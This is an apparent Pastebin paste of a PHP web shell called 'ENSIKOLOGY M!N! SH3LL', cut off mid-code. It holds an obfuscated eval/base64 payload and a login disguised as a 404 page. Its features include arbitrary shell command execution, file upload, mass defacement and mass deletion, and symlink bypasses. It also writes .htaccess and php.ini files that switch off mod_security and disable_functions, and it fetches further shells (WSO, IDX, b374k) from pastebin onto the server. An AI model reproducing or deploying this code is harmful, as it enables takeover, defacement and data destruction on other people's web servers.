Ensikology

ENSIKOLOGY M!N! SH3LL

Mar 14th, 2019
491
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 246.89 KB | None | 0 0
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4. eval(gzinflate(base64_decode('jY9dS8MwFIbvBf9DKIN00m1eiEjLoMNFGDg/us6bUkJsz9Zo82GayvrvTZ1MtyuvAud5z/OexIXSnR8P6N3inqwyvMN5hq3QVDIBOA9OyH46jM7PYi45bcD6WLVWt5a+tpsNGC63OECXwwj9Bkre6Jp1FIxRpvnBjlDLBdCaC279fnRYECCU6fbExfH11RI7XgErwfj4VkkL0o7STkOILOzspLKijlBRMeME03V6N7rpNwa2fWuZFIzXaIowFBV8spqDEeyjZDVIFm97OC6UwC6+o5rZykW9ylodTiYeGqMBXZHkhSQZ3r/0YbYkOD8iCXlek1VK18kC506koWGSugZje9uG7w7yUKOLxROalaWBpkEhypB34lo+poTO5vPku8VDuReh/kz/z38C5BHZ8HdVq23nBUeVjv1HOoy+AA==')));
  5. $auth_pass = "fec87ee2ce2db774f788b34564d2b1df";
  6. if(get_magic_quotes_gpc()) {
  7. function VEstripslashes($array) { return is_array($array) ? array_map('VEstripslashes', $array) : stripslashes($array); }
  8. $_POST = VEstripslashes($_POST);
  9. $_COOKIE = VEstripslashes($_COOKIE); }
  10.  
  11.  
  12. function Login() {
  13. die("
  14. <html><head><title>404 Not Found</title></head>
  15. <style>
  16. input { margin:0;background-color:#fff;border:1px solid #fff; }
  17. </style>
  18. <body>
  19. <h1>Not Found</h1>
  20. <p>The requested URL was not found on this server.</p><hr>
  21. <form method=post>
  22. <input type=password name=pass></form></body></html>");
  23. }
  24.  
  25. function VEsetcookie($k, $v) {
  26. $_COOKIE[$k] = $v;
  27. setcookie($k, $v);
  28. }
  29.  
  30. if(!empty($auth_pass)) {
  31. if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  32. VEsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  33.  
  34. if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  35. Login();
  36. }
  37. ?>
  38. <!DOCTYPE HTML>
  39. <HTML>
  40. <HEAD>
  41. <link href='https://fonts.googleapis.com/css?family=Poppins%3A400%2C700%7CRaleway%3A400%2C700&ver=5.0.3' rel='stylesheet' type='text/css'/>
  42. <link href='//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css' rel='stylesheet' type='text/css'/>
  43. <title>ENSIKOLOGY M!N! SH3LL</title>
  44. <link rel="icon" href="https://2.bp.blogspot.com/-OMx6JG69BA8/XIpTaZw_U-I/AAAAAAAAEaU/ED4G-xSI5pADVHIuGIktZsJEwJdQzZ3swCLcBGAs/s1600/32x32.png" sizes="32x32" />
  45. <link rel="icon" href="https://2.bp.blogspot.com/-d5nboAUJBGg/XIpTaZ5ZbVI/AAAAAAAAEaY/5n5wMcIFRRg7pj-HfnMRGGDWYJiIr3LkQCLcBGAs/s1600/192x192.png" sizes="192x192" />
  46. <link rel="apple-touch-icon-precomposed" href="https://3.bp.blogspot.com/-VQhTmSDHC6s/XIpTaWyk2SI/AAAAAAAAEaQ/rVKxDPlt6DoHDTt_-7KFGU4J-jmrB6xMwCLcBGAs/s1600/180x180.png" />
  47. <meta name="msapplication-TileImage" content="https://1.bp.blogspot.com/-c3UN9En5pd8/XIpTDhwwOWI/AAAAAAAAEaI/xhe3nG5PtuYp_upzCxDPr0-p6FxYVzXPACLcBGAs/s1600/270x270.png" />
  48. <style type="text/css">
  49. body{
  50. background: #000000;
  51. color:#fff;
  52. }
  53. li {
  54. display: inline;
  55. margin: 1px;
  56. padding: 1px;
  57. }
  58. table{
  59. border: 3px #0078d4 solid;
  60. }
  61. table td{
  62. border-bottom: 1px solid #0078d4;
  63. }
  64. .body table td {
  65. border: 1px solid #e9e9e9;
  66. padding: 10px;
  67. text-align: left;
  68. vertical-align: top;
  69. }
  70. #content .first{
  71. background-color: #0078d4;
  72. }
  73. #menu a {
  74. padding:2px 10px;
  75. margin:0;
  76. background:#000000;
  77. text-decoration:none;
  78. letter-spacing:2px;
  79. padding: 2px 10px;
  80. margin: 0;
  81. background: #000000;
  82. text-decoration: none;
  83. letter-spacing: 2px;
  84. border-radius: 2px;
  85. border-bottom: 2px solid #0078d4;
  86. border-top: 2px solid #0078d4;
  87. border-right: 2px solid #0078d4;
  88. border-left: 2px solid #0078d4;
  89. }
  90. #menu a:hover {
  91. background:#f24a4a;
  92. }
  93. a{
  94. color:#fff;
  95. text-decoration: none;
  96. }
  97. textarea{
  98. backgroud-color:#000000;
  99. color: #000;
  100. }
  101. input,select{
  102. border: 1px #0078d4solid;
  103. -moz-border-radius: 5px;
  104. -webkit-border-radius:5px;
  105. border-radius:5px;
  106. }
  107. </style>
  108. </HEAD>
  109.  
  110. <?php
  111. function w($dir,$perm) {
  112. if(!is_writable($dir)) {
  113. return "<font color=red>".$perm."</font>";
  114. } else {
  115. return "<font color=green>".$perm."</font>";
  116. }
  117. }
  118. function exe($cmd) {
  119. if(function_exists('system')) {
  120. @ob_start();
  121. @system($cmd);
  122. $buff = @ob_get_contents();
  123. @ob_end_clean();
  124. return $buff;
  125. } elseif(function_exists('exec')) {
  126. @exec($cmd,$results);
  127. $buff = "";
  128. foreach($results as $result) {
  129. $buff .= $result;
  130. } return $buff;
  131. } elseif(function_exists('passthru')) {
  132. @ob_start();
  133. @passthru($cmd);
  134. $buff = @ob_get_contents();
  135. @ob_end_clean();
  136. return $buff;
  137. } elseif(function_exists('shell_exec')) {
  138. $buff = @shell_exec($cmd);
  139. return $buff;
  140. }
  141. }
  142. function sulap($text) {
  143. if(!get_magic_quotes_gpc()) {
  144. return $text;
  145. }
  146. return stripslashes($text);
  147. }
  148. function ambilKata($param, $kata1, $kata2){
  149. if(strpos($param, $kata1) === FALSE) return FALSE;
  150. if(strpos($param, $kata2) === FALSE) return FALSE;
  151. $start = strpos($param, $kata1) + strlen($kata1);
  152. $end = strpos($param, $kata2, $start);
  153. $return = substr($param, $start, $end - $start);
  154. return $return;
  155. }
  156. function perms($file){
  157. $perms = fileperms($file);
  158. if (($perms & 0xC000) == 0xC000) {
  159. // Socket
  160. $info = 's';
  161. } elseif (($perms & 0xA000) == 0xA000) {
  162. // Symbolic Link
  163. $info = 'l';
  164. } elseif (($perms & 0x8000) == 0x8000) {
  165. // Regular
  166. $info = '-';
  167. } elseif (($perms & 0x6000) == 0x6000) {
  168. // Block special
  169. $info = 'b';
  170. } elseif (($perms & 0x4000) == 0x4000) {
  171. // Directory
  172. $info = 'd';
  173. } elseif (($perms & 0x2000) == 0x2000) {
  174. // Character special
  175. $info = 'c';
  176. } elseif (($perms & 0x1000) == 0x1000) {
  177. // FIFO pipe
  178. $info = 'p';
  179. } else {
  180. // Unknown
  181. $info = 'u';
  182. }
  183.  
  184. // Owner
  185. $info .= (($perms & 0x0100) ? 'r' : '-');
  186. $info .= (($perms & 0x0080) ? 'w' : '-');
  187. $info .= (($perms & 0x0040) ?
  188. (($perms & 0x0800) ? 's' : 'x' ) :
  189. (($perms & 0x0800) ? 'S' : '-'));
  190.  
  191. // Group
  192. $info .= (($perms & 0x0020) ? 'r' : '-');
  193. $info .= (($perms & 0x0010) ? 'w' : '-');
  194. $info .= (($perms & 0x0008) ?
  195. (($perms & 0x0400) ? 's' : 'x' ) :
  196. (($perms & 0x0400) ? 'S' : '-'));
  197.  
  198. // World
  199. $info .= (($perms & 0x0004) ? 'r' : '-');
  200. $info .= (($perms & 0x0002) ? 'w' : '-');
  201. $info .= (($perms & 0x0001) ?
  202. (($perms & 0x0200) ? 't' : 'x' ) :
  203. (($perms & 0x0200) ? 'T' : '-'));
  204.  
  205. return $info;
  206. }
  207. $_c7e = 'RW5zaWtvbG9neQ==';
  208. $sys = php_uname();
  209. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  210. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';
  211. $getds = @ini_get("disable_functions");
  212. $ds = (!empty($getds)) ? "<font>$ds</font>" : "<font>NONE</font>";
  213. if(isset($_GET['path'])){
  214. $path = $_GET['path'];
  215. }else{
  216. $path = getcwd();
  217. }
  218. $path = str_replace('\\','/',$path);
  219. $paths = explode('/',$path);
  220. $home_r = $_SERVER['DOCUMENT_ROOT'];
  221. $_COPY = base64_decode($_c7e);
  222. if(get_magic_quotes_gpc()){
  223. foreach($_POST as $key=>$value){
  224. $_POST[$key] = stripslashes($value);
  225. }
  226. }
  227. if($_POST['upload']) {
  228. if($_POST['tipe_upload'] == 'biasa') {
  229. if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
  230. $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
  231. } else {
  232. $act = "<font color=red>Failed to upload file</font>";
  233. }
  234. } else {
  235. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  236. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  237. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  238. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  239. $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  240. } else {
  241. $act = "<font color=red>Failed to upload file</font>";
  242. }
  243. } else {
  244. $act = "<font color=red>Failed to upload file</font>";
  245. }
  246. }
  247. }
  248. echo "<center>Uploader :
  249. <form method='post' enctype='multipart/form-data'>
  250. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
  251. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  252. <input type='file' name='ix_file'>
  253. <input type='submit' value='upload' name='upload'>
  254. </form>";
  255. echo $act;
  256. echo '<center>
  257. <table width="700" align="center">
  258. <center>
  259. <form method="get">
  260. <select name="shell">
  261. <option value="">Shell Creator</option>
  262. <option value="wso">WSO Shell</option>
  263. <option value="idx">IDX Shell</option>
  264. <option value="b374k">B374K Shell</option>
  265. <option value="r57">R57 Shell</option>
  266. <option value="b374k">b374k Shell</option>
  267. <option value="blackhat">BlackHat Shell</option>
  268. <option value="noname">Noname Shell</option>
  269. </select>
  270. <input type="submit" value=">">
  271. </form>
  272. </center>
  273. ';
  274. echo'
  275. <div id="menu">
  276. <center>
  277. <ul>
  278. <li><a href="?">Home</a></li>
  279. <li><a href="?path='.$path.'&EnsikologyScience=info">System Info</a></li>
  280. <li><a href="?path='.$path.'&EnsikologyScience=config">Config Grab</a></li>
  281. <li><a href="?path='.$path.'&EnsikologyScience=crkcp">Cp Crack</a></li>
  282. <li><a href="?path='.$path.'&EnsikologyScience=jumping">Jumping</a></li>
  283. <li><a href="?path='.$path.'&EnsikologyScience=symlink">Symlink</a></li>
  284. <li><a href="?path='.$path.'&EnsikologyScience=adminer">Adminer</a></li><br><br>
  285. <li><a href="?path='.$path.'&EnsikologyScience=network">BackConnect</a>
  286. <li><a href="?path='.$path.'&EnsikologyScience=mail">Mailer</a></li>
  287. <li><a href="?path='.$path.'&EnsikologyScience=edituser">Auto Edit User</a></li>
  288. <li><a href="?path='.$path.'&EnsikologyScience=zoneh">Zone-H</a></li>
  289. <li><a href="?path='.$path.'&EnsikologyScience=defid">Defacer.id</a></li>
  290. <li><a href="?path='.$path.'&EnsikologyScience=symconfig">SymConfig</a></li><br><br>
  291. <li><a href="?path='.$path.'&EnsikologyScience=disablefunc">Disable Functions</a></li>
  292. <li><a href="?path='.$path.'&EnsikologyScience=domains">Domain Views</a></li>
  293. <li><a href="?path='.$path.'&EnsikologyScience=hashid">Hash ID</a></li>
  294. <li><a href="?path='.$path.'&EnsikologyScience=bing">Bing Grab</a></li>
  295. <li><a href="?path='.$path.'&EnsikologyScience=mass_deface">Mass Tools</a></li><br><br>
  296. <li><a href="?path='.$path.'&EnsikologyScience=cmd">Command</a></li>
  297. <li><a href="?path='.$path.'&EnsikologyScience=csrfup">Csrf Exploiter</a></li>
  298. <li><a href="?path='.$path.'&EnsikologyScience=vhost">Bypass Vhost</a></li>
  299. <li><a href="?path='.$path.'&EnsikologyScience=kill">Kill Your Self</a></li>
  300. </ul></center></div>';
  301. echo '
  302. <br>
  303. <table width="700" align="center">
  304. <tr><td><font color="white">Current Path :</font>';
  305. foreach($paths as $id=>$pat){
  306. if($pat == '' && $id == 0){
  307. $a = true;
  308. echo '<a href="?path=/">/</a>';
  309. continue;
  310. }
  311. if($pat == '') continue;
  312. echo '<a href="?path=';
  313. for($i=0;$i<=$id;$i++){
  314. echo "$paths[$i]";
  315. if($i != $id) echo "/";
  316. }
  317. echo '">'.$pat.'</a>/';
  318. }
  319. echo '</td></tr>';
  320. echo '</table>';
  321. if($_GET['EnsikologyScience'] == 'logout') {
  322. echo '<form action="?patch='.$path.'&do=logout" method="post">';
  323. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  324. echo 'Good Bye!!';
  325. } elseif($_GET['EnsikologyScience'] == 'cmd') {
  326. echo "<br><fieldset>";
  327. echo "<form method='post'>
  328. <font style='text-decoration: underline;'>Command : </font>
  329. <input type='text' size='30' height='10' name='command'><input type='submit' name='c7ecmd' value='>>'>
  330. </form> ";
  331. if(isset($_POST['c7ecmd']))
  332. {
  333.  
  334. echo'<br><div style="background:#6d6d6d;margin:0px;padding:1px;text-align:left;color:lime;"><pre>';
  335. $cmd = $_POST['command'];
  336. if($cmd == "")
  337. {
  338.  
  339. echo "Please Insert Command!";
  340. }
  341.  
  342. elseif(isset($cmd))
  343. {
  344. $output = exe($cmd);
  345. echo $output; }
  346. echo'</pre></div><br><br>';
  347. }
  348. echo "</fieldset><br>";
  349. }elseif($_GET['EnsikologyScience'] == 'mass_deface') {
  350. echo "<center><form action=\"\" method=\"post\">\n";
  351. $dirr=$_POST['d_dir'];
  352. $index = $_POST["script"];
  353. $index = str_replace('"',"'",$index);
  354. $index = stripslashes($index);
  355. function edit_file($file,$index){
  356. if (is_writable($file)) {
  357. clear_fill($file,$index);
  358. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  359. }
  360. else {
  361. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  362. }
  363. }
  364. function hapus_massal($dir,$namafile) {
  365. if(is_writable($dir)) {
  366. $dira = scandir($dir);
  367. foreach($dira as $dirb) {
  368. $dirc = "$dir/$dirb";
  369. $lokasi = $dirc.'/'.$namafile;
  370. if($dirb === '.') {
  371. if(file_exists("$dir/$namafile")) {
  372. unlink("$dir/$namafile");
  373. }
  374. } elseif($dirb === '..') {
  375. if(file_exists("".dirname($dir)."/$namafile")) {
  376. unlink("".dirname($dir)."/$namafile");
  377. }
  378. } else {
  379. if(is_dir($dirc)) {
  380. if(is_writable($dirc)) {
  381. if(file_exists($lokasi)) {
  382. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  383. unlink($lokasi);
  384. $idx = hapus_massal($dirc,$namafile);
  385. }
  386. }
  387. }
  388. }
  389. }
  390. }
  391. }
  392. function clear_fill($file,$index){
  393. if(file_exists($file)){
  394. $handle = fopen($file,'w');
  395. fwrite($handle,'');
  396. fwrite($handle,$index);
  397. fclose($handle); } }
  398.  
  399. function gass(){
  400. global $dirr , $index ;
  401. chdir($dirr);
  402. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  403. $files = scandir($dirr) ;
  404. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  405. sort($files);
  406. $n = 0 ;
  407. foreach ($files as $file){
  408. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  409. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  410. edit_file($file,$index);
  411. flush();
  412. $n = $n +1 ;
  413. }
  414. }
  415. echo "<br>";
  416. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  417. }
  418. function ListFiles($dirrall) {
  419.  
  420. if($dh = opendir($dirrall)) {
  421.  
  422. $files = Array();
  423. $inner_files = Array();
  424. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  425. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  426. while($file = readdir($dh)) {
  427. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  428. if(is_dir($dirrall . "/" . $file)) {
  429. $inner_files = ListFiles($dirrall . "/" . $file);
  430. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  431. } else {
  432. array_push($files, $dirrall . "/" . $file);
  433. }
  434. }
  435. }
  436.  
  437. closedir($dh);
  438. return $files;
  439. }
  440. }
  441. function gass_all(){
  442. global $index ;
  443. $dirrall=$_POST['d_dir'];
  444. foreach (ListFiles($dirrall) as $key=>$file){
  445. $file = str_replace('//',"/",$file);
  446. echo "<center><strong>$file</strong> ===>";
  447. edit_file($file,$index);
  448. flush();
  449. }
  450. $key = $key+1;
  451. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
  452. function sabun_massal($dir,$namafile,$isi_script) {
  453. if(is_writable($dir)) {
  454. $dira = scandir($dir);
  455. foreach($dira as $dirb) {
  456. $dirc = "$dir/$dirb";
  457. $lokasi = $dirc.'/'.$namafile;
  458. if($dirb === '.') {
  459. file_put_contents($lokasi, $isi_script);
  460. } elseif($dirb === '..') {
  461. file_put_contents($lokasi, $isi_script);
  462. } else {
  463. if(is_dir($dirc)) {
  464. if(is_writable($dirc)) {
  465. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  466. file_put_contents($lokasi, $isi_script);
  467. $idx = sabun_massal($dirc,$namafile,$isi_script);
  468. }
  469. }
  470. }
  471. }
  472. }
  473. }
  474. if($_POST['mass'] == 'onedir') {
  475. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  476. $ini="http://";
  477. $mainpath=$_POST[d_dir];
  478. $file=$_POST[d_file];
  479. $dir=opendir("$mainpath");
  480. $code=base64_encode($_POST[script]);
  481. $indx=base64_decode($code);
  482. while($row=readdir($dir)){
  483. $start=@fopen("$row/$file","w+");
  484. $finish=@fwrite($start,$indx);
  485. if ($finish){
  486. echo"$ini$row/$file\n";
  487. }
  488. }
  489. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  490. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  491. $dir=opendir("$mainpath");
  492. $code=base64_encode($_POST[script]);
  493. $indx=base64_decode($code);
  494. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  495. $finish=@fwrite($start,$indx);
  496. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  497. }
  498.  
  499. }
  500. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  501. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  502. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  503. elseif($_POST['mass'] == 'massdeface') {
  504. echo "<div style='margin: 5px auto; padding: 5px'>";
  505. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  506. echo "</div>"; }
  507. else {
  508. echo "
  509. <center><font style='text-decoration: underline;'>
  510. Select Type:<br>
  511. </font>
  512. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  513. <option value=\"onedir\">Mass Deface 1 Dir</option>
  514. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  515. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  516. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  517. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  518. <font style='text-decoration: underline;'>Folder:</font><br>
  519. <input type='text' name='d_dir' value='$path' style='width: 450px;' height='10'><br>
  520. <font style='text-decoration: underline;'>Filename:</font><br>
  521. <input type='text' name='d_file' value='dc.php' style='width: 450px;' height='10'><br>
  522. <font style='text-decoration: underline;'>Index File:</font><br>
  523. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By ./Ensikology</textarea><br>
  524. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  525. </form></center>";
  526. }
  527. } elseif($_GET['EnsikologyScience'] == 'vhost') {
  528. echo "<form method='POST' action=''>";
  529. echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
  530. echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
  531. if (isset($_POST['Colii'])){ system('ln -s / Ensikology.txt');
  532. $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
  533. $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","Ensikology.txt");
  534. $rt="<br><a href=Ensikology.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
  535. Bypassed Successfully</b></font></a>";
  536. echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt</center>";} echo "</form>";
  537. } elseif($_GET['EnsikologyScience'] == 'csrfup')
  538. {
  539. echo '<html>
  540. <center><h1 style="font-size:33px;">CSRF Exploiter By IndoXPloit</h1><br><br>
  541. <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
  542. <br><br>
  543. <form method="post" style="font-size:25px;">
  544. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  545. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  546. <input type="submit" name="d" value="Lock!">
  547. </form>';
  548. $url = $_POST["url"];
  549. $pf = $_POST["pf"];
  550. $d = $_POST["d"];
  551. if($d) {
  552. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
  553. </html>";
  554. }
  555. } elseif($_GET['EnsikologyScience'] == 'hashid') {
  556. if (isset($_POST['gethash'])) {
  557. $hash = $_POST['hash'];
  558. if (strlen($hash) == 32) {
  559. $hashresult = "MD5 Hash";
  560. } elseif (strlen($hash) == 40) {
  561. $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  562. } elseif (strlen($hash) == 13) {
  563. $hashresult = "DES(Unix) Hash";
  564. } elseif (strlen($hash) == 16) {
  565. $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  566. } elseif (strlen($hash) == 41) {
  567. $GetHashChar = substr($hash, 40);
  568. if ($GetHashChar == "*") {
  569. $hashresult = "MySQL5 Hash";
  570. }
  571. } elseif (strlen($hash) == 64) {
  572. $hashresult = "SHA-256 Hash";
  573. } elseif (strlen($hash) == 96) {
  574. $hashresult = "SHA-384 Hash";
  575. } elseif (strlen($hash) == 128) {
  576. $hashresult = "SHA-512 Hash";
  577. } elseif (strlen($hash) == 34) {
  578. if (strstr($hash, '$1$')) {
  579. $hashresult = "MD5(Unix) Hash";
  580. }
  581. } elseif (strlen($hash) == 37) {
  582. if (strstr($hash, '$apr1$')) {
  583. $hashresult = "MD5(APR) Hash";
  584. }
  585. } elseif (strlen($hash) == 34) {
  586. if (strstr($hash, '$H$')) {
  587. $hashresult = "MD5(phpBB3) Hash";
  588. }
  589. } elseif (strlen($hash) == 34) {
  590. if (strstr($hash, '$P$')) {
  591. $hashresult = "MD5(Wordpress) Hash";
  592. }
  593. } elseif (strlen($hash) == 39) {
  594. if (strstr($hash, '$5$')) {
  595. $hashresult = "SHA-256(Unix) Hash";
  596. }
  597. } elseif (strlen($hash) == 39) {
  598. if (strstr($hash, '$6$')) {
  599. $hashresult = "SHA-512(Unix) Hash";
  600. }
  601. } elseif (strlen($hash) == 24) {
  602. if (strstr($hash, '==')) {
  603. $hashresult = "MD5(Base-64) Hash";
  604. }
  605. } else {
  606. $hashresult = "Hash type not found";
  607. }
  608. } else {
  609. $hashresult = "Not Hash Entered";
  610. }
  611. ?>
  612. <center><br><Br><br>
  613.  
  614. <form action="" method="POST">
  615. <tr>
  616. <table >
  617. <th colspan="5">Hash Identification</th>
  618. <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
  619. <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
  620. </table></tr></form>
  621. </center>
  622. <?php
  623. } elseif($_GET['EnsikologyScience'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  624. } elseif($_GET['EnsikologyScience'] == 'disablefunc'){
  625. echo "<center>";
  626. echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
  627. if(isset($_POST['ini']))
  628. {
  629. $file = fopen("php.ini","w");
  630. echo fwrite($file,"disable_functions=none
  631. safe_mode = Off
  632. ");
  633. fclose($file);
  634. echo "<a href='php.ini'>click here!</a>";
  635. } if(isset($_POST['htce']))
  636. {
  637. $file = fopen(".htaccess","w");
  638. echo fwrite($file,"<IfModule mod_security.c>
  639. SecFilterEngine Off
  640. SecFilterScanPOST Off
  641. </IfModule>
  642. ");
  643. fclose($file);
  644. echo "htaccess successfully created!";
  645. }
  646. echo"</center>";
  647. }elseif($_GET['shell'] == 'wso'){
  648. $tools_dir = mkdir('c7e_tools', 0755);
  649. $file_tools = "c7e_tools/wso.php";
  650. $isi_httools = "<IfModule mod_security.c>
  651. SecFilterEngine Off
  652. SecFilterScanPOST Off
  653. </IfModule>";
  654. $httools = fopen(".htaccess", "w");
  655. $tools_script = file_get_contents("http://pastebin.com/raw.php?i=N0eh3Q7Y");
  656. $tools = fopen($file_tools, "w");
  657. fwrite($tools, $tools_script);
  658. fwrite($httools, $isi_httools);
  659. chmod($file_tools, 0755);
  660. echo "Done <a href='c7e_tools/wso.php'>WSO Shell Here</a>";
  661. }
  662. elseif($_GET['shell'] == 'idx'){
  663. $tools2_dir = mkdir('c7e_tools', 0755);
  664. $file_tools2 = "c7e_tools/idx.php";
  665. $isi_httools2 = "<IfModule mod_security.c>
  666. SecFilterEngine Off
  667. SecFilterScanPOST Off
  668. </IfModule>";
  669. $httools2 = fopen(".htaccess", "w");
  670. $tools2_script = file_get_contents("http://pastebin.com/raw.php?i=nC6pWh5a");
  671. $tools2 = fopen($file_tools2, "w");
  672. fwrite($tools2, $tools2_script);
  673. fwrite($httools2, $isi_httools2);
  674. chmod($file_tools2, 0755);
  675. echo "Done <a href='c7e_tools/idx.php'>Idx Shell Here</a>";
  676. }
  677. elseif($_GET['shell'] == 'b374k'){
  678. $tools3_dir = mkdir('c7e_tools', 0755);
  679. $file_tools3 = "c7e_tools/b374k.php";
  680. $isi_httools3 = "<IfModule mod_security.c>
  681. SecFilterEngine Off
  682. SecFilterScanPOST Off
  683. </IfModule>";
  684. $httools3 = fopen(".htaccess", "w");
  685. $tools3_script = file_get_contents("http://pastebin.com/raw.php?i=cR71LiMp");
  686. $tools3 = fopen($file_tools3, "w");
  687. fwrite($tools3, $tools3_script);
  688. fwrite($httools3, $isi_httools3);
  689. chmod($file_tools3, 0755);
  690. echo "Done <a href='c7e_tools/b374k.php'>b374k Shell Here</a>";
  691. }
  692. elseif($_GET['shell'] == 'sadrazam'){
  693. $tools4_dir = mkdir('c7e_tools', 0755);
  694. $file_tools4 = "c7e_tools/sadrazam.php";
  695. $isi_httools4 = "<IfModule mod_security.c>
  696. SecFilterEngine Off
  697. SecFilterScanPOST Off
  698. </IfModule>";
  699. $httools4 = fopen(".htaccess", "w");
  700. $tools4_script = file_get_contents("http://pastebin.com/raw.php?i=xjKrnnBD");
  701. $tools4 = fopen($file_tools4, "w");
  702. fwrite($tools4, $tools4_script);
  703. fwrite($httools4, $isi_httools4);
  704. chmod($file_tools4, 0755);
  705. echo "Done <a href='c7e_tools/sadrazam.php'>Sadrazam Shell Here</a>";
  706. }
  707. elseif($_GET['shell'] == 'blackhat'){
  708. $tools5_dir = mkdir('c7e_tools', 0755);
